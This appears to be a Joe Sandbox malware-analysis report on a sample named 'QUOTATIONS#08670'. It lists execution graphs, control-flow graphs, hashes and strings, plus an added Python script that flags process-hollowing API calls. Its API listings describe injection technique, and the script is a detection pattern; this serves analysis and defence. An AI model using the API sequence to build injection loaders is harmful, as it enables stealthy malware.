53688 57e0e70 53688->53670 53689->53688 53690->53688 53693 57e0de4 53691->53693 53692 57e0e70 53692->53670 53694 57e0e78 CallWindowProcW 53693->53694 53695 57e0e88 CallWindowProcW 53693->53695 53694->53692 53695->53692 53697 57e0e88 53696->53697 53698 57e0e99 53697->53698 53703 57e229e 53697->53703 53698->53683 53701 57e229e CallWindowProcW 53700->53701 53702 57e0e99 53700->53702 53701->53702 53702->53683 53704 57e22aa 53703->53704 53705 57e2306 53703->53705 53710 57e231e 53704->53710 53705->53704 53706 57e2308 53705->53706 53707 57e231e CallWindowProcW 53706->53707 53711 57e2332 53710->53711 53713 57e22da 53710->53713 53712 57e238a CallWindowProcW 53711->53712 53711->53713 53712->53713 53713->53698 53726 7924b2b 53727 7924b6b 53726->53727 53728 7924f99 53727->53728 53730 7927948 53727->53730 53732 792796f 53730->53732 53731 7927a33 53731->53727 53732->53731 53734 7929cd0 53732->53734 53735 7929d4f CreateProcessAsUserW 53734->53735 53737 7929e50 53735->53737 53714 792ca08 53715 792ca50 VirtualProtectEx 53714->53715 53717 792ca8e 53715->53717 53738 792cca8 53739 792cced Wow64SetThreadContext 53738->53739 53741 792cd35 53739->53741
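The execution graph above is Joe Sandbox's flattened node/edge list: each node is `id address [API]`, each edge is `src->dst`, and every disconnected subgraph is one function in the dumped code. The Python below is an added example, not part of the report, that parses that list, groups nodes by function and checks whether the API set of a WOW64 process-hollowing sequence (CreateProcessAsUserW, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread) is present. The embedded input is an excerpt of the graph printed above, trimmed to the subgraphs that carry API calls; the hollowing API set and the verdict logic are this example's own assumptions, not sandbox signatures.

```python
"""Parse a Joe Sandbox execution_graph edge list and flag the process-hollowing
API set.  Added example; not part of the sandbox report or its tooling."""
import re
from collections import defaultdict

# Excerpt of the execution_graph line in this report, trimmed to the function
# subgraphs that reach a Win32 API (node ids and addresses copied verbatim).
GRAPH_TEXT = (
    "execution_graph 53639 792cf10 53640 792cf50 ResumeThread 53639->53640 "
    "53642 792cf81 53640->53642 53643 792b890 53644 792b8d5 Wow64GetThreadContext "
    "53643->53644 53646 792b91d 53644->53646 53742 712acd0 53743 712ad16 DeleteFileW "
    "53742->53743 53745 712ad4f 53743->53745 53722 792c2b8 53723 792c300 "
    "WriteProcessMemory 53722->53723 53725 792c357 53723->53725 53765 792bf78 "
    "53766 792bfb8 VirtualAllocEx 53765->53766 53768 792bff5 53766->53768 "
    "53734 7929cd0 53735 7929d4f CreateProcessAsUserW 53734->53735 53737 7929e50 "
    "53735->53737 53714 792ca08 53715 792ca50 VirtualProtectEx 53714->53715 "
    "53717 792ca8e 53715->53717 53738 792cca8 53739 792cced Wow64SetThreadContext "
    "53738->53739 53741 792cd35 53739->53741"
)

# Node ids (decimal) and code addresses (lowercase hex) both match this; the
# parser tells them apart by position, since an id is always followed by its address.
HEXTOKEN = re.compile(r"^[0-9a-f]+$")

# Assumed detection set: the calls a WOW64 process-hollowing loader needs.
HOLLOWING_APIS = {"CreateProcessAsUserW", "VirtualAllocEx", "WriteProcessMemory",
                  "Wow64SetThreadContext", "ResumeThread"}


def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, api_or_None),
    edges is a list of (src_id, dst_id) pairs."""
    nodes, edges = {}, []
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    current, expect_addr = None, False
    for tok in tokens:
        if "->" in tok:
            src, dst = tok.split("->", 1)
            edges.append((src, dst))
        elif HEXTOKEN.match(tok):
            if expect_addr:
                nodes[current] = (tok, None)      # second token of a pair: address
                expect_addr = False
            else:
                current, expect_addr = tok, True  # first token of a pair: node id
        elif current is not None:
            addr, _ = nodes[current]              # any other token: API at that node
            nodes[current] = (addr, tok)
    return nodes, edges


def components(nodes, edges):
    """Union-find over the edge list; one component per function subgraph."""
    parent = {n: n for n in nodes}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in edges:
        if a in parent and b in parent:
            parent[find(a)] = find(b)
    groups = defaultdict(list)
    for n in nodes:
        groups[find(n)].append(n)
    return list(groups.values())


def apis_by_function(nodes, edges):
    """Map each subgraph's entry address (a node with no predecessor) to the
    sorted APIs reached inside it; subgraphs without an API call are skipped."""
    has_pred = {dst for _, dst in edges}
    result = {}
    for comp in components(nodes, edges):
        entries = [n for n in comp if n not in has_pred]
        entry_addr = nodes[min(entries)][0] if entries else nodes[comp[0]][0]
        apis = sorted({nodes[n][1] for n in comp if nodes[n][1]})
        if apis:
            result[entry_addr] = apis
    return result


def hollowing_verdict(nodes):
    """Heuristic: which of the assumed hollowing APIs are reached anywhere."""
    seen = {api for _, api in nodes.values() if api}
    found = HOLLOWING_APIS & seen
    return {"complete": found == HOLLOWING_APIS,
            "found": sorted(found), "missing": sorted(HOLLOWING_APIS - found)}


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(GRAPH_TEXT)
    for entry, apis in sorted(apis_by_function(nodes, edges).items()):
        print(f"function @ {entry}: {', '.join(apis)}")
    print(hollowing_verdict(nodes))
```

The graph records only which APIs each function reaches, not the call order or the arguments, so the verdict is a triage signal: the creation flags passed to CreateProcessAsUserW and the buffer handed to WriteProcessMemory have to be confirmed from the API argument listings and the memory dumps further down the report before calling it hollowing.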
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                          • API String ID: 0-2006360050
                                                          • Opcode ID: d74994aab7c5d4cabda46c721ba472089f37f69ade2f4e92f9ce96bf7bbd41f9
                                                          • Instruction ID: 7082467a15f57873c23fae007cc222cd947258cac36768a3797d34e5b154406a
                                                          • Opcode Fuzzy Hash: d74994aab7c5d4cabda46c721ba472089f37f69ade2f4e92f9ce96bf7bbd41f9
                                                          • Instruction Fuzzy Hash: B9822630A00209DFCB14CF68D984AAEBBF2FF88314F158569E555EB2A5DB30ED41CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 281 6d2b8a0-6d2ea67 284 6d2ec15-6d2ec66 281->284 285 6d2ea6d-6d2ea73 281->285 310 6d2ec80-6d2ec8d 284->310 311 6d2ec68-6d2ec75 284->311 286 6d2eab4-6d2eac8 285->286 287 6d2ea75-6d2ea7c 285->287 289 6d2eaea-6d2eaf3 286->289 290 6d2eaca-6d2eace 286->290 291 6d2ea96-6d2eaaf call 6d2ce84 287->291 292 6d2ea7e-6d2ea8b 287->292 294 6d2eaf5-6d2eb02 289->294 295 6d2eb0d-6d2eb29 289->295 290->289 293 6d2ead0-6d2eadc 290->293 291->286 292->291 293->289 304 6d2eade-6d2eae4 293->304 294->295 306 6d2ebd1-6d2ebf5 295->306 307 6d2eb2f-6d2eb3a 295->307 304->289 318 6d2ebf7 306->318 319 6d2ebff-6d2ec00 306->319 315 6d2eb52-6d2eb59 307->315 316 6d2eb3c-6d2eb42 307->316 314 6d2ec95-6d2ec9a 310->314 311->310 320 6d2ece1-6d2ece8 314->320 321 6d2ec9c-6d2eca3 314->321 324 6d2eb5b-6d2eb65 315->324 325 6d2eb6d-6d2eb90 call 6d2a26c 315->325 322 6d2eb46-6d2eb48 316->322 323 6d2eb44 316->323 318->319 319->284 329 6d2ed02-6d2ed0b 320->329 330 6d2ecea-6d2ecf7 320->330 327 6d2eca5-6d2ecb2 321->327 328 6d2ecbd-6d2ecd2 321->328 322->315 323->315 324->325 338 6d2eb92-6d2eb9f 325->338 339 6d2eba1-6d2ebb2 325->339 327->328 328->320 342 6d2ecd4-6d2ecdb 328->342 332 6d2ed11-6d2ed14 329->332 333 6d2ed0d-6d2ed0f 329->333 330->329 337 6d2ed15-6d2ed26 332->337 333->337 347 6d2ed28-6d2ed2f 337->347 348 6d2ed69-6d2ed6c 337->348 338->339 349 6d2ebbf-6d2ebcb 338->349 339->349 350 6d2ebb4-6d2ebb7 339->350 342->320 346 6d2ed6f-6d2ed9a call 6d26880 342->346 360 6d2eda1-6d2ee02 call 6d26880 346->360 352 6d2ed31-6d2ed3e 347->352 353 6d2ed49-6d2ed5e 347->353 349->306 349->307 350->349 352->353 353->348 359 6d2ed60-6d2ed67 353->359 359->348 359->360 369 6d2ee04-6d2ee17 360->369 370 6d2ee1a-6d2ee20 360->370 371 6d2ee22-6d2ee29 370->371 372 6d2ee90-6d2eee8 370->372 374 6d2eeef-6d2ef47 371->374 375 6d2ee2f-6d2ee3f 371->375 372->374 380 6d2ef4e-6d2f05c 374->380 379 6d2ee45-6d2ee49 375->379 375->380 383 6d2ee4c-6d2ee4e 379->383 422 6d2f0ae-6d2f106 
380->422 423 6d2f05e-6d2f06e 380->423 385 6d2ee73-6d2ee75 383->385 386 6d2ee50-6d2ee60 383->386 389 6d2ee77-6d2ee81 385->389 390 6d2ee84-6d2ee8d 385->390 395 6d2ee62-6d2ee71 386->395 396 6d2ee4b 386->396 395->385 395->396 396->383 427 6d2f10d-6d2f21a 422->427 426 6d2f074-6d2f078 423->426 423->427 429 6d2f07b-6d2f07d 426->429 461 6d2f232-6d2f238 427->461 462 6d2f21c-6d2f22f 427->462 431 6d2f091-6d2f093 429->431 432 6d2f07f-6d2f08f 429->432 434 6d2f0a2-6d2f0ab 431->434 435 6d2f095-6d2f09f 431->435 432->431 439 6d2f07a 432->439 439->429 463 6d2f2b2-6d2f30a 461->463 464 6d2f23a-6d2f241 461->464 466 6d2f311-6d2f369 463->466 464->466 467 6d2f247-6d2f24b 464->467 468 6d2f370-6d2f3d5 466->468 467->468 469 6d2f251-6d2f255 467->469 504 6d2f3d6-6d2f454 468->504 471 6d2f258-6d2f265 469->471 478 6d2f267-6d2f277 471->478 479 6d2f28a-6d2f297 471->479 486 6d2f257 478->486 487 6d2f279-6d2f288 478->487 489 6d2f2a6-6d2f2af 479->489 490 6d2f299-6d2f2a3 479->490 486->471 487->479 487->486 516 6d2f456-6d2f474 504->516 517 6d2f4d0-6d2f528 516->517 518 6d2f476-6d2f47a 516->518 520 6d2f52f-6d2f5b4 517->520 519 6d2f480-6d2f484 518->519 518->520 521 6d2f487-6d2f494 519->521 549 6d2f5b7-6d2f610 520->549 526 6d2f496-6d2f4a6 521->526 527 6d2f4a8-6d2f4b5 521->527 526->527 536 6d2f486 526->536 533 6d2f4b7-6d2f4c1 527->533 534 6d2f4c4-6d2f4cd 527->534 536->521 557 6d2f612-6d2f628 549->557 560 6d2f640-6d2f641 557->560 561 6d2f62a-6d2f630 557->561 562 6d2f632 561->562 563 6d2f634-6d2f636 561->563 562->560 563->560
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (cq$Hcq$Hcq$Hcq$Hcq$Hcq$Hcq$PH_q
                                                          • API String ID: 0-3937201477
                                                          • Opcode ID: 5cdbf5e4b9739be7e9b26509e8801f08869731a19cf3033b557c65d770748aee
                                                          • Instruction ID: a30738818236b65783888204d08f33717d49604d5c9686890943b72a5bc926ff
                                                          • Opcode Fuzzy Hash: 5cdbf5e4b9739be7e9b26509e8801f08869731a19cf3033b557c65d770748aee
                                                          • Instruction Fuzzy Hash: 3172E430B402158FDB58EB78C85466E7BA2FFD8314F248969E516DB3A5CE30DC0ACB91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$(o_q$(o_q$(o_q$,cq$,cq$Hcq
                                                          • API String ID: 0-3730146716
                                                          • Opcode ID: f62ad729d09560efbee698135f9b671a3f27cec4707e9d0fb85dab5b81963682
                                                          • Instruction ID: 7a264134999514bff5db83465189ffa59aa14d32728deff6f4d92794ba2df036
                                                          • Opcode Fuzzy Hash: f62ad729d09560efbee698135f9b671a3f27cec4707e9d0fb85dab5b81963682
                                                          • Instruction Fuzzy Hash: C8723870A00219DFDB14DF69C894ABEBBB6FF88300F248569E905EB3A5DB309D45CB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1133 71e21e5-71e2447 1162 71e44ad-71e475b 1133->1162 1163 71e244d-71e3160 1133->1163 1230 71e5640-71e65da 1162->1230 1231 71e4761-71e5638 1162->1231 1562 71e3166-71e34d8 1163->1562 1563 71e34e0-71e44a5 1163->1563 1792 71e6960-71e6973 1230->1792 1793 71e65e0-71e6958 1230->1793 1231->1230 1562->1563 1563->1162 1797 71e6979-71e6fad 1792->1797 1798 71e6fb5-71e7e47 1792->1798 1793->1792 1797->1798 2181 71e7e47 call 71e98cc 1798->2181 2182 71e7e47 call 71e98bd 1798->2182 2179 71e7e4d-71e7e54 2181->2179 2182->2179
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 230b657808acf76b724b7b6b8396cd678936bfca0682c68df71198f1d5359feb
                                                          • Instruction ID: 2cff97f5f852eef1cd12817b518894d2ed67f0175fce6606a1d98ea5461fc940
                                                          • Opcode Fuzzy Hash: 230b657808acf76b724b7b6b8396cd678936bfca0682c68df71198f1d5359feb
                                                          • Instruction Fuzzy Hash: E2B33970E11218CFCB68EF78D9996ACBBB2BB89300F4055E9D049A72A4EF345D85CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2183 71e2210-71e2447 2211 71e44ad-71e475b 2183->2211 2212 71e244d-71e3160 2183->2212 2279 71e5640-71e65da 2211->2279 2280 71e4761-71e5638 2211->2280 2611 71e3166-71e34d8 2212->2611 2612 71e34e0-71e44a5 2212->2612 2841 71e6960-71e6973 2279->2841 2842 71e65e0-71e6958 2279->2842 2280->2279 2611->2612 2612->2211 2846 71e6979-71e6fad 2841->2846 2847 71e6fb5-71e7e47 2841->2847 2842->2841 2846->2847 3230 71e7e47 call 71e98cc 2847->3230 3231 71e7e47 call 71e98bd 2847->3231 3228 71e7e4d-71e7e54 3230->3228 3231->3228
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 16b654dd74ab33978fbb327345587aa9ff50e1564071c1fb5f64a6a7af9086ed
                                                          • Instruction ID: 6524015cf907289f2ccebe1b513fd432d35d599d97bfa797ab8e79eb3fbbafaf
                                                          • Opcode Fuzzy Hash: 16b654dd74ab33978fbb327345587aa9ff50e1564071c1fb5f64a6a7af9086ed
                                                          • Instruction Fuzzy Hash: 55B32970E11218CFCB68EF78D9996ACBBB2BB89300F4055E9D049A72A4EF345D85CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4188 7123538-7123740 5141 7123742 call 7129dd0 4188->5141 5142 7123742 call 7129de0 4188->5142 4211 7123748-7128cf6 call 712a480 5140 7128cfc-7128d03 4211->5140 5141->4211 5142->4211
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024406151.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7120000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cceb6de57bb2c6024ac8b29d7644bad07b4a8c1d1356f07c3537b7111376caf5
                                                          • Instruction ID: 642e80240f584a7640689e2eb7f2ed8414378b904653ea69d3219c7c68a34f26
                                                          • Opcode Fuzzy Hash: cceb6de57bb2c6024ac8b29d7644bad07b4a8c1d1356f07c3537b7111376caf5
                                                          • Instruction Fuzzy Hash: 05B30A70E112198FCB24FF38E99966CBBF2BB89200F4185E9D488A3294DF345D95CF95

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5144 792a250-792a275 5145 792a277 5144->5145 5146 792a27c-792a2a0 5144->5146 5145->5146 5147 792a2a1 5146->5147 5148 792a2a8-792a2c4 5147->5148 5149 792a2c6 5148->5149 5150 792a2cd-792a2ce 5148->5150 5149->5147 5149->5150 5151 792a493-792a4c6 call 79237d8 5149->5151 5152 792a2d3-792a2f7 5149->5152 5153 792a4f3-792a4fc 5149->5153 5154 792a2f9-792a30a 5149->5154 5155 792a3fd 5149->5155 5156 792a3c2-792a3f5 call 7928590 5149->5156 5157 792a320-792a328 5149->5157 5158 792a426-792a429 5149->5158 5159 792a366-792a37e 5149->5159 5160 792a4e5-792a4ee 5149->5160 5161 792a3aa-792a3bd 5149->5161 5162 792a448-792a460 5149->5162 5163 792a4ce-792a4e0 5149->5163 5150->5153 5151->5163 5152->5148 5179 792a32a-792a32c 5154->5179 5180 792a30c-792a31e 5154->5180 5172 792a406-792a421 5155->5172 5156->5155 5165 792a32f-792a33a 5157->5165 5174 792a432-792a443 5158->5174 5182 792a380-792a38f 5159->5182 5183 792a391-792a398 5159->5183 5160->5148 5161->5148 5177 792a462-792a471 5162->5177 5178 792a473-792a47a 5162->5178 5163->5148 5169 792a33c-792a34b 5165->5169 5170 792a34d-792a354 5165->5170 5181 792a35b-792a361 5169->5181 5170->5181 5172->5148 5174->5148 5184 792a481-792a48e 5177->5184 5178->5184 5179->5165 5180->5148 5181->5148 5187 792a39f-792a3a5 5182->5187 5183->5187 5184->5148 5187->5148
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: e\1$e\1$"*p$"*p
                                                          • API String ID: 0-1513742261
                                                          • Opcode ID: 5f46f49be4a6ad4894982d911111a3f0881bf5209f53d729804da3dfa541a2cf
                                                          • Instruction ID: 714c757d59ff145c4ada27db49e096d11c4703d5ea9ad298b6597b0daceb626f
                                                          • Opcode Fuzzy Hash: 5f46f49be4a6ad4894982d911111a3f0881bf5209f53d729804da3dfa541a2cf
                                                          • Instruction Fuzzy Hash: 648123B1D052298FCB14DFA5D9446EEBBF2FF89304F20952AC816BB258D7785A02CF54

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5454 79227c0-79227da 5455 79227e1-792288c 5454->5455 5456 79227dc 5454->5456 5466 792288f 5455->5466 5456->5455 5467 7922896-79228b2 5466->5467 5468 79228b4 5467->5468 5469 79228bb-79228bc 5467->5469 5468->5466 5470 79229a0-79229e1 call 7923fa1 5468->5470 5471 79228c1-79228db 5468->5471 5472 79229f4-79229f8 5468->5472 5473 7922a2b-7922a31 5468->5473 5474 79228dd-792296d 5468->5474 5469->5471 5469->5473 5488 79229e7-79229ef 5470->5488 5471->5467 5475 79229fa-7922a09 5472->5475 5476 7922a0b-7922a12 5472->5476 5491 7922980-7922987 5474->5491 5492 792296f-792297e 5474->5492 5478 7922a19-7922a26 5475->5478 5476->5478 5478->5467 5488->5467 5493 792298e-792299b 5491->5493 5492->5493 5493->5467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6f$6f$$_q
                                                          • API String ID: 0-2170083937
                                                          • Opcode ID: bddc970dcea92d29a83e7a4597779363b2c31273aaf0e9e7522c27d2cf89362f
                                                          • Instruction ID: 4d7e072f89cb110362c0f58761ce3b4a49ec9b9545e72a37c46a0790774a87c4
                                                          • Opcode Fuzzy Hash: bddc970dcea92d29a83e7a4597779363b2c31273aaf0e9e7522c27d2cf89362f
                                                          • Instruction Fuzzy Hash: DD7103B4E00218DFDB04DFA5D58569EBBF2FF89300F21852AD40AAB758DB385946CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 6f$$_q
                                                          • API String ID: 0-708473364
                                                          • Opcode ID: a945cbc57d5daefa6b289589ff73f39c3b4a42b27d64fb2d8c9e3c1842ecfb5d
                                                          • Instruction ID: 531e298d8289220ca27257b04d8a232f98473cc09516a505e53cefb073f54f23
                                                          • Opcode Fuzzy Hash: a945cbc57d5daefa6b289589ff73f39c3b4a42b27d64fb2d8c9e3c1842ecfb5d
                                                          • Instruction Fuzzy Hash: 4371E4B4E002099FDB04DFA5D58559EBBF2FF89300F21852AE40AA7758DB385946CF51
                                                          APIs
                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07929E3B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CreateProcessUser
                                                          • String ID:
                                                          • API String ID: 2217836671-0
                                                          • Opcode ID: 0dfa3c5ad24dddba50a9ece95405338efbf764ce8440628d98a2abfe93fde93f
                                                          • Instruction ID: c8f3c613666384cdc1cd5e0a03fbab2c76f049dc7dd37dc13cf4c76bd2f449b5
                                                          • Opcode Fuzzy Hash: 0dfa3c5ad24dddba50a9ece95405338efbf764ce8440628d98a2abfe93fde93f
                                                          • Instruction Fuzzy Hash: 7B512AB1D0022ADFCB24DF59C844BDDBBB5BF48314F0484AAE908B7254DB71AA85DF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,cq
                                                          • API String ID: 0-2322431649
                                                          • Opcode ID: 9a71742531842ebd6ed54f2bdcc326179b795b3204436206ee6dde2577bd2e53
                                                          • Instruction ID: 07e983f2a79e3da975b7047758c6d75e5a0380d148992246d17e96238b5527bf
                                                          • Opcode Fuzzy Hash: 9a71742531842ebd6ed54f2bdcc326179b795b3204436206ee6dde2577bd2e53
                                                          • Instruction Fuzzy Hash: 77B191B57002099FDB199F78C894B7A7BA6FF85721F158468E509DB2A2CB30EC41CB52
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b746de685843d3f7488ef6922452fbf8a3b24c784c768ae59851ec183bf80f3a
                                                          • Instruction ID: af17a7f98905da95326e6fe691e8c93b50ca5478ddeac6a4fd64815a0d3ac7f9
                                                          • Opcode Fuzzy Hash: b746de685843d3f7488ef6922452fbf8a3b24c784c768ae59851ec183bf80f3a
                                                          • Instruction Fuzzy Hash: 7D527C30A003168FCB14DF28C944B99B7B2FF89314F2582E9D5586F3A1DB71A986CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2022576283.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6d20000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abe2e5b811e7dcca8d72888788037793a34e0ccdfa9693568ef947dcd31cc200
                                                          • Instruction ID: eb05eb6f2357f98fec14dafd09a281ea56393aed7024b82c5c3dfe7f0d9b7321
                                                          • Opcode Fuzzy Hash: abe2e5b811e7dcca8d72888788037793a34e0ccdfa9693568ef947dcd31cc200
                                                          • Instruction Fuzzy Hash: 8F527E30A007568FCB14DF28C944B99B7B2FF85314F2582E9D5586F3A2DB71A986CF81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9649f728fc7badc508f19aceee936acfa86605f4ece096462d81f27232677003
                                                          • Instruction ID: 98e55dd2c89dd71fe9ac47501f491848f203c2ebb582aa2b846b4b4d13e7bf16
                                                          • Opcode Fuzzy Hash: 9649f728fc7badc508f19aceee936acfa86605f4ece096462d81f27232677003
                                                          • Instruction Fuzzy Hash: 31F139B0A1166A8FDB24DF65C94479DBBB6BF88300F10D6E6D40DA7668D7749E82CF00
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eefcd07d4860b8d3011d364edbe3d875efd75a56f2033da2646735e53c1bdc6
                                                          • Instruction ID: f0242880dbe46323de9c9aadb16607e870d0314ff548dadbe3fd40843478bc38
                                                          • Opcode Fuzzy Hash: 4eefcd07d4860b8d3011d364edbe3d875efd75a56f2033da2646735e53c1bdc6
                                                          • Instruction Fuzzy Hash: B86168B0D10269DFCB04DFE5D9446AEBBB1FF89304F10892AD416AB268C7B85A42DF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2025146738.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7920000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6147bd0b0a90b8fe297cb336a0f0fcc4f53b9281fda1b39f946874c632d61128
                                                          • Instruction ID: 7c7e0fd505756b859e10acf9ee28377d5f56eb85a15e5e6143c8ca0fbccd50bf
                                                          • Opcode Fuzzy Hash: 6147bd0b0a90b8fe297cb336a0f0fcc4f53b9281fda1b39f946874c632d61128
                                                          • Instruction Fuzzy Hash: 7F618BB0E10269DFCB04DFA4D8446AEBBB1FF89304F10892AD416EB268C7785E42DF51

                                                          Control-flow Graph (legend: Executed / Not Executed): function 8f97d0-8f9cbe, calling 8f9248; the rendered graph image is not reproduced here.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2006993941.00000000008F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8f0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (o_q$$_q$$_q
                                                          • API String ID: 0-2711016522
                                                          • Opcode ID: 12e602990db855609ff3cbb6b78320ebb51228580a657fb0b6fd4ac825668823
                                                          • Instruction ID: 33045b7d14db8554ffb96d44f6f290a8eb57371a89d076bd2e28e67bf2e55e21
                                                          • Opcode Fuzzy Hash: 12e602990db855609ff3cbb6b78320ebb51228580a657fb0b6fd4ac825668823
                                                          • Instruction Fuzzy Hash: 3C723F74A0021CCFDB159BA8C964BAEBBB6FF84300F1080A9D60AAB3A5DF355D45DF51

                                                          Control-flow Graph (legend: Executed / Not Executed): function 71e0ef4-71e0f15 (no outgoing calls in the graph); the rendered graph image is not reproduced here.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2024910722.00000000071E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_71e0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
